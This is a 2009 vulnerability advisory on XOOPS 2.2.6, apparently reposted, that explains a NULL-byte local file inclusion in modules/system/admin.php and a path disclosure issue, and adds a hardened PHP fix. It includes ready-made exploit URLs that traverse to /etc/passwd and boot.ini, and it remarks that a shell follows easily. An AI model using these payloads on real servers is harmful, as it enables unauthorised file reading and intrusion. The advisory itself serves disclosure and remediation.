XOOPS 2.2.6 local include vulnerability - vulnerability warning - the black bar safety net

ID MYHACK58:62200925177
Type myhack58
Reporter Anonymous
Modified 2009-11-02T00:00:00


Author: Oldjun

I happened to run across this foreign CMS, XOOPS 2.2.6. I googled it: the version is old, but I didn't find any known vulnerability, so I went through the source code myself. I still didn't find anything really usable, but I did see a couple of low-value issues, so here they are.

XOOPS is a web application platform written in PHP for the MySQL database. Its object orientation makes it an ideal tool for developing small or large community websites, intra-company and corporate portals, weblogs and much more. (Reference: http://www.xoops.org)

  1. Local File Inclusion vulnerability:

/* works with: magic_quotes_gpc = Off */

Running into this PHP configuration these days is about as likely as winning the lottery, which is why the bug is of so little use.

Local File Include vulnerability found in script: modules/system/admin.php

See the source:

    <?php
    // $fct comes straight from the request; only trim() is applied
    if (isset($_POST['fct'])) {
        $fct = trim($_POST['fct']);
    }
    if (isset($_GET['fct'])) {
        $fct = trim($_GET['fct']);
    }
    $xoopsOption['pagetype'] = "admin";
    include "../../mainfile.php";
    // Use when you need to be registered user and login
    if (!$xoopsUser) {
        redirect_header(XOOPS_URL."/user.php", 3, _AD_NORIGHT);
    }
    include XOOPS_ROOT_PATH."/include/cp_functions.php";
    include_once XOOPS_ROOT_PATH."/modules/system/constants.php";
    $error = false;
    if (isset($fct) && $fct != '') {
        // sink: $fct reaches file_exists() and include with a fixed suffix appended
        if (file_exists(XOOPS_ROOT_PATH."/modules/system/admin/".$fct."/xoops_version.php")) {
            if (file_exists(XOOPS_ROOT_PATH."/modules/system/language/".$xoopsConfig['language']."/admin/".$fct.".php")) {
                include XOOPS_ROOT_PATH."/modules/system/language/".$xoopsConfig['language']."/admin/".$fct.".php";
            } elseif (file_exists(XOOPS_ROOT_PATH."/modules/system/language/english/admin/".$fct.".php")) {
                include XOOPS_ROOT_PATH."/modules/system/language/english/admin/".$fct.".php";
            }
            include XOOPS_ROOT_PATH."/modules/system/admin/".$fct."/xoops_version.php";
            ...
    ?>

If magic_quotes_gpc is disabled, it is possible to control the content of the "$fct" variable and inject an arbitrary filename followed by a NULL byte (%00), which makes file_exists() ignore the trailing "/xoops_version.php" (and, in the same way, the trailing ".php" of the language-file checks that follow). The same truncation applies to the include statements, so the named file's contents end up in the application response. With magic_quotes_gpc on, the NULL byte is escaped to a backslash-zero sequence and the path no longer truncates, which is why the setting matters. Two further caveats a practitioner should note: the script above redirects when $xoopsUser is unset, so at least a registered account is needed to reach the include; and PHP 5.3.4 and later reject paths containing NULL bytes in file functions, so the truncation trick only works on older PHP.

With a suitably constructed fct, and magic_quotes_gpc off, getting a shell is basically not a problem: include a local file that already contains attacker-controlled PHP.

Example:

  http://[server]/[installdir]/modules/system/admin.php?fct=../../../../../../../boot.ini%00
  http://[server]/[installdir]/modules/system/admin.php?fct=../../../../../../../etc/passwd%00
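The root cause is that a request parameter reaches file_exists() and include with only trim() applied. The following is an added example written for this page, not XOOPS project code: it keeps the original path construction for comparison and places a hardened lookup beside it, which accepts only a bare directory name and then confirms with realpath() that the resolved file is under modules/system/admin/. The function names resolveAdminModule and resolveAdminLanguage are mine; XOOPS_ROOT_PATH is assumed to be the constant that mainfile.php defines, and the self-test falls back to the script's own directory when it is not defined. The probe inputs at the bottom are constructed, the NULL-byte one being the advisory's payload.

```php
<?php
// Added example for this page (not XOOPS code): hardened handling of the
// `fct` parameter from modules/system/admin.php.

// The original construction, kept only to show what the payload hits: under
// PHP < 5.3.4 with magic_quotes_gpc off, a "\0" in $fct ends the path at the
// C level, so "/xoops_version.php" is never seen by file_exists()/include.
function legacyAdminModulePath($fct)
{
    return XOOPS_ROOT_PATH . "/modules/system/admin/" . $fct . "/xoops_version.php";
}

// Hardened lookup. Returns the absolute xoops_version.php path for a valid
// module directory, or null to reject the request.
function resolveAdminModule($fct)
{
    // 1. Strict allowlist: no "/", "\", ".", or NUL can pass. \A and \z anchor
    //    at the true string ends ($ alone would tolerate a trailing "\n").
    if (!is_string($fct) || !preg_match('/\A[A-Za-z0-9_]+\z/', $fct)) {
        return null;
    }
    $adminDir = realpath(XOOPS_ROOT_PATH . '/modules/system/admin');
    if ($adminDir === false) {
        return null;
    }
    // 2. Canonicalise and confirm containment. Step 1 already rules out
    //    traversal; this survives later refactors and symlinked module dirs.
    $candidate = realpath($adminDir . '/' . $fct . '/xoops_version.php');
    if ($candidate === false) {
        return null; // no such module
    }
    $prefix = $adminDir . DIRECTORY_SEPARATOR;
    if (strncmp($candidate, $prefix, strlen($prefix)) !== 0) {
        return null; // resolved outside modules/system/admin/
    }
    return $candidate;
}

// Language-file lookup with the english fallback of the original, built only
// after $fct has been validated. $language is assumed to come from
// $xoopsConfig['language'] and is allowlisted the same way, defence in depth.
function resolveAdminLanguage($fct, $language)
{
    if (resolveAdminModule($fct) === null) {
        return null;
    }
    if (!is_string($language) || !preg_match('/\A[A-Za-z0-9_]+\z/', $language)) {
        $language = 'english';
    }
    $base = XOOPS_ROOT_PATH . '/modules/system/language/';
    foreach (array($language, 'english') as $lang) {
        $file = $base . $lang . '/admin/' . $fct . '.php';
        if (file_exists($file)) {
            return $file;
        }
    }
    return null;
}

// Self-test with constructed inputs. Run from a XOOPS root for a real hit on
// 'users'; elsewhere every probe is rejected, which is the point.
if (!defined('XOOPS_ROOT_PATH')) {
    define('XOOPS_ROOT_PATH', __DIR__); // assumption for stand-alone runs
}
$probes = array(
    'users',                              // legitimate-looking module name
    "../../../../../../../etc/passwd\0",  // the advisory's payload
    '../../mainfile',                     // plain traversal, no NUL
    "users\0",                            // NUL without traversal
);
foreach ($probes as $p) {
    $r = resolveAdminModule($p);
    printf("%-42s => %s\n", json_encode($p), $r === null ? 'rejected' : $r);
}
```

The allowlist does the real work: once $fct can only be letters, digits and underscores, neither the NULL byte nor "../" can survive, regardless of magic_quotes_gpc or PHP version. The realpath() containment check costs one extra stat and guards against the validation being loosened later.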

  2. Path disclosure:

Many files leak the installation path when requested directly, for example /class/uploader.php and /class/theme.php: the direct request ends in a PHP error whose message carries the absolute filesystem path. This only shows up when display_errors is on, so it is a configuration issue as much as a code one.

In fact, when gpc is off, the first vulnerability alone is enough to get in; but gpc being off is too much to hope for, so it is of little use, really of little use.

One thing worth saying is that XOOPS as a whole is still very secure. This version is already old enough, but its security was never sloppy. Searching milw0rm for XOOPS problems, they are basically all in modules; the various modules may have issues, but the core system doesn't~